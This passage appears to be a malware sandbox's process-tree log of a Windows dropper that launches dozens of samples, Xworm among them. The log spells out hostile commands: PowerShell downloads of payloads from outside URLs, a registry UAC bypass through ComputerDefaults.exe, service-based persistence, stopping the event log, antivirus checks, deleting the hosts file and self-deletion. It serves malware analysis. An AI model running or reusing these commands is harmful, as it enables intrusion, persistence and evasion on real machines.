    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
        5⤵
        
        PID:7300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
        5⤵
        
        PID:7312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --lang=uk --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
        5⤵
        
        PID:7340
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2660 /prefetch:2
        5⤵
        
        PID:7816
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2708 /prefetch:2
        5⤵
        
        PID:7728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3056 /prefetch:2
        5⤵
        
        PID:7612
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --disable-gpu-compositing --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
        5⤵
        
        PID:7544
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3184 /prefetch:2
        5⤵
        
        PID:7424
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=2524 /prefetch:3
        5⤵
        
        PID:7416
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,12858217004248226671,14393646792356506018,131072 --lang=uk --service-sandbox-type=utility --mojo-platform-channel-handle=3380 /prefetch:8
        5⤵
        
        PID:7408
- - C:\Users\Admin\Desktop\Files\test_again4.exe
    "C:\Users\Admin\Desktop\Files\test_again4.exe"
    3⤵
    PID:7080
- - C:\Users\Admin\Desktop\Files\DivineDialogue.exe
    "C:\Users\Admin\Desktop\Files\DivineDialogue.exe"
    3⤵
    PID:1112
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Prerequisite Prerequisite.bat & Prerequisite.bat
      4⤵
      PID:4996
- - C:\Users\Admin\Desktop\Files\Edge.exe
    "C:\Users\Admin\Desktop\Files\Edge.exe"
    3⤵
    PID:7476
  - - C:\Users\Admin\AppData\Local\Temp\Edge.exe
      "C:\Users\Admin\AppData\Local\Temp\Edge.exe"
      4⤵
      PID:2588
- - C:\Users\Admin\Desktop\Files\ConsoleApp3.exe
    "C:\Users\Admin\Desktop\Files\ConsoleApp3.exe"
    3⤵
    PID:7312
- - C:\Users\Admin\Desktop\Files\kill.exe
    "C:\Users\Admin\Desktop\Files\kill.exe"
    3⤵
    PID:6280
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:2164
- - C:\Users\Admin\Desktop\Files\2r61ahry.exe
    "C:\Users\Admin\Desktop\Files\2r61ahry.exe"
    3⤵
    PID:7008
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:5652
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:4296
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:6896
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5948
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "VJAODQWN"
      4⤵
      Launches sc.exe
      PID:7176
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "VJAODQWN" binpath= "C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:348
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2024
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "VJAODQWN"
      4⤵
      Launches sc.exe
      PID:3628
- - C:\Users\Admin\Desktop\Files\InfluencedNervous.exe
    "C:\Users\Admin\Desktop\Files\InfluencedNervous.exe"
    3⤵
    PID:4036
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit
      4⤵
      PID:5096
- - C:\Users\Admin\Desktop\Files\build_2024-07-25_20-56.exe
    "C:\Users\Admin\Desktop\Files\build_2024-07-25_20-56.exe"
    3⤵
    PID:6368
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\Files\build_2024-07-25_20-56.exe" & rd /s /q "C:\ProgramData\KFCFBFHIEBKJ" & exit
      4⤵
      PID:7900
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:2020
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 1396
      4⤵
      Program crash
      PID:7608
- - C:\Users\Admin\Desktop\Files\DOC.exe
    "C:\Users\Admin\Desktop\Files\DOC.exe"
    3⤵
    PID:7800
- - C:\Users\Admin\Desktop\Files\DIFF.exe
    "C:\Users\Admin\Desktop\Files\DIFF.exe"
    3⤵
    PID:1756
- - C:\Users\Admin\Desktop\Files\windowsexecutable.exe
    "C:\Users\Admin\Desktop\Files\windowsexecutable.exe"
    3⤵
    PID:4008
- - C:\Users\Admin\Desktop\Files\Set_up.exe
    "C:\Users\Admin\Desktop\Files\Set_up.exe"
    3⤵
    PID:5340
- - C:\Users\Admin\Desktop\Files\channel.exe
    "C:\Users\Admin\Desktop\Files\channel.exe"
    3⤵
    PID:5752
- - C:\Users\Admin\Desktop\Files\s.exe
    "C:\Users\Admin\Desktop\Files\s.exe"
    3⤵
    PID:7032
- C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod (2).exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod (2).exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6340
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\main_v4.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\main_v4.exe"
    3⤵
    PID:5476
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3808
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      PID:380
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      PID:6344
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      PID:5252
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:584
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      PID:3572
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      PID:7124
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      Detects videocard installed
      PID:1720
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5072
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:584
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6504
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      PID:3916
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      PID:6508
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6488
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      PID:1416
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      PID:6084
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      Detects videocard installed
      PID:3252
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5768
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5592
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\TikTok18.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\TikTok18.exe"
    3⤵
    PID:2140
  - - C:\Users\Admin\AppData\Local\Temp\e5d3069\TikTok18.exe
      run=1 shortcut="C:\Users\Admin\Desktop\New Text Document mod.exse\a\TikTok18.exe"
      4⤵
      PID:6076
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c .\TikTok18.bat
        5⤵
        
        PID:5224
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5616
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe"
    3⤵
    PID:6724
  - - C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe"
      4⤵
      PID:6592
  - - C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe"
      4⤵
      PID:5060
  - - C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe"
      4⤵
      PID:5440
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1256
        5⤵
        Program crash
        
        PID:5228
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1292
        5⤵
        Program crash
        
        PID:5012
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 304
      4⤵
      Program crash
      PID:4712
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\fHR9z2C.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\fHR9z2C.exe"
    3⤵
    PID:6580
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:6924
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:5516
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5337.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:6928
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5337.vbs" /f
        5⤵
        
        PID:6380
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        
        PID:6160
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:4984
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:2716
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\5337.vbs
        6⤵
        
        PID:1872
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        7⤵
        
        PID:3976
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\5337.vbs
      4⤵
      PID:3640
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:6408
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:5060
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:6000
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:2708
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4996.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:3052
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4996.vbs" /f
        5⤵
        
        PID:5904
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        
        PID:5192
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:112
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:4892
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\4996.vbs
        6⤵
        
        PID:5588
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
        7⤵
        
        PID:4676
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\4996.vbs
      4⤵
      PID:972
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:4608
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:6120
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:5184
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:6052
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6465.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:4004
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6465.vbs" /f
        5⤵
        
        PID:5964
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        
        PID:2052
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:2736
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:6624
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\6465.vbs
        6⤵
        
        PID:3652
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
        7⤵
        
        PID:2724
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\6465.vbs
      4⤵
      PID:6156
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:6948
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:6260
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\AmLzNi.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\AmLzNi.exe"
    3⤵
    PID:6224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3652
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\Xworm%20V5.6.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Xworm%20V5.6.exe"
    3⤵
    PID:3444
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe"
    3⤵
    PID:2544
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\VBVEd6f.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\VBVEd6f.exe"
    3⤵
    PID:3628
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Appreciate Appreciate.cmd && Appreciate.cmd
      4⤵
      PID:3976
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:1928
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        
        PID:1656
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:6088
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        5⤵
        
        PID:760
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 397506
        5⤵
        
        PID:3436
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Concept + ..\Mix + ..\Trunk + ..\Answers + ..\Bufing + ..\Benefits + ..\Ram + ..\Guides k
        5⤵
        
        PID:5944
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test12.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test12.exe"
    3⤵
    PID:4444
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test6.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test6.exe"
    3⤵
    PID:5916
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test14.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test14.exe"
    3⤵
    PID:5224
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\pantest.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\pantest.exe"
    3⤵
    PID:3792
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test9.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test9.exe"
    3⤵
    PID:6988
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test10-29.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test10-29.exe"
    3⤵
    PID:2300
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test19.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test19.exe"
    3⤵
    PID:2988
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test10.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test10.exe"
    3⤵
    PID:5900
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test_again4.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test_again4.exe"
    3⤵
    PID:6304
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test23.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test23.exe"
    3⤵
    PID:5740
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test5.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test5.exe"
    3⤵
    PID:5184
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test11.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test11.exe"
    3⤵
    PID:1204
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test20.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test20.exe"
    3⤵
    PID:2148
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test_again3.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test_again3.exe"
    3⤵
    PID:2008
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test16.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test16.exe"
    3⤵
    PID:6004
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test13.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test13.exe"
    3⤵
    PID:2396
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test_again2.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test_again2.exe"
    3⤵
    PID:6808
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test15.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test15.exe"
    3⤵
    PID:3392
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test18.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test18.exe"
    3⤵
    PID:5020
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test21.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test21.exe"
    3⤵
    PID:1500
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test22.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test22.exe"
    3⤵
    PID:4712
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test8.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test8.exe"
    3⤵
    PID:5520
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test7.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test7.exe"
    3⤵
    PID:1188
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test-again.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test-again.exe"
    3⤵
    PID:2380
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test17.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test17.exe"
    3⤵
    PID:5592
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe"
    3⤵
    PID:3636
  - - C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exse\a\vg9qcBa.exe"
      4⤵
      PID:3300
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\win.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\win.exe"
    3⤵
    PID:8088
  - - C:\Windows\SysWOW64\route.exe
      route print
      4⤵
      PID:6696
  - - C:\Windows\SysWOW64\arp.exe
      arp -a 10.127.0.1
      4⤵
      Network Service Discovery
      PID:2900
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\9758xBqgE1azKnB.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\9758xBqgE1azKnB.exe"
    3⤵
    PID:5476
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\7mpPLxE.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\7mpPLxE.exe"
    3⤵
    PID:5376
- C:\Users\Admin\Desktop\New Text Document mod (2).exe
  "C:\Users\Admin\Desktop\New Text Document mod (2).exe"
  2⤵
  PID:6784
- - C:\Users\Admin\Desktop\a\Winsvc.exe
    "C:\Users\Admin\Desktop\a\Winsvc.exe"
    3⤵
    PID:6624
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:5396
